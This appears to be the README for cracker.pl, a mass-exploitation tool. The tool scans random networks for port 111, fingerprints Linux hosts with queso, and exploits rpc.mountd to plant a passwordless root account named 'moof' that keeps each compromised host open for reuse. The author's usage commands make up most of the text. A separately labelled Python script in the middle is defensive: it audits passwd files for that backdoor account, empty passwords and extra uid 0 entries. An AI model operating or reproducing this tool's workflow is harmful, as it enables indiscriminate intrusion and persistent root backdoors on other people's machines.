cracker.pl

The real credit goes to the programmer of QUESO and to
ADM for exploiting rpc.mountd.

Comments/suggestions may be emailed to ryan@phorce.net.

Flames may be directed towards /dev/null.

### How to use ###

If you just want to let it do its own thing, type

./cracker.pl <class> &

For example, ./cracker.pl B & will constantly scan random class B's for
as long as the box stays up.

If you want to scan a specified subnet, type

./cracker.pl -s

It will prompt you for pscan syntax. The pscan syntax is

./pscan <Class A> <port> [class b] [class c]

For example, if you wanted to scan all of 206.10.*.* you would type
"206 111 10" at the prompt. Always scan for port 111.

If you have problems running this, please run with -b (verbose) and email
a log to ryan@phorce.net, thanks!

Every box cracker finds vulnerable is added to cracker.log.

A user "moof" is created on each exploit. It also leaves the box
exploitable, so you can still get in with rpc.mountd after the
initial exploit.

Run ./install.sh to install all the proper binaries. Yes, you must
be root.

### What does this do? ###
- Randomly generates class A, B or C addresses (your choice), portscans
  for 111, does a queso OS check for Linux, and attempts to exploit it.
  The ADMmountd has been modded to add a user moof to the password file
  with no password and uid/gid 0.
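
A host-side check for the account described above, as an added example that is not part of the original cracker.pl package: it audits passwd-format text for the "moof" entry, any empty password field, and any uid 0 account other than root. The function name audit_passwd and the sample entries are assumptions constructed for illustration.

```python
import sys

# Account name stated in this README; extend with other names as needed.
KNOWN_BACKDOOR_NAMES = {"moof"}


def audit_passwd(text):
    """Return a sorted list of (username, reason) findings for passwd text."""
    findings = set()
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blank lines, comments and NIS compat entries (+name / -name).
        if not line or line[0] in "#+-":
            continue
        fields = line.split(":")
        if len(fields) < 4:
            findings.add((fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if name in KNOWN_BACKDOOR_NAMES:
            findings.add((name, "account name used by cracker.pl"))
        # An empty second field means no password is required at all
        # ("x" or "*" would mean shadowed or locked).
        if pw == "":
            findings.add((name, "empty password field"))
        # Any uid 0 entry has full root privileges regardless of its name.
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.add((name, "uid 0 but not root"))
    return sorted(findings)


# Constructed sample: a passwd file containing the kind of entry the
# README describes (home directory and shell fields are made up).
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/false
alice:x:1000:1000:Alice:/home/alice:/bin/bash
moof::0:0::/:/bin/sh
"""

if __name__ == "__main__":
    # Audit the file given on the command line, or the sample if none.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for name, reason in audit_passwd(text):
        print(f"{name}: {reason}")
```

Because the README states the box is left exploitable through rpc.mountd, removing the account alone does not close the hole; mountd also has to be patched or disabled.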

Shouts go out to DrUnix, Drago, and of course tnt/p.

Also shouts to Volatile, a person I don't know but I'm using his
pscan in this package without his permission. (which I think
is semi-private)

-ryan
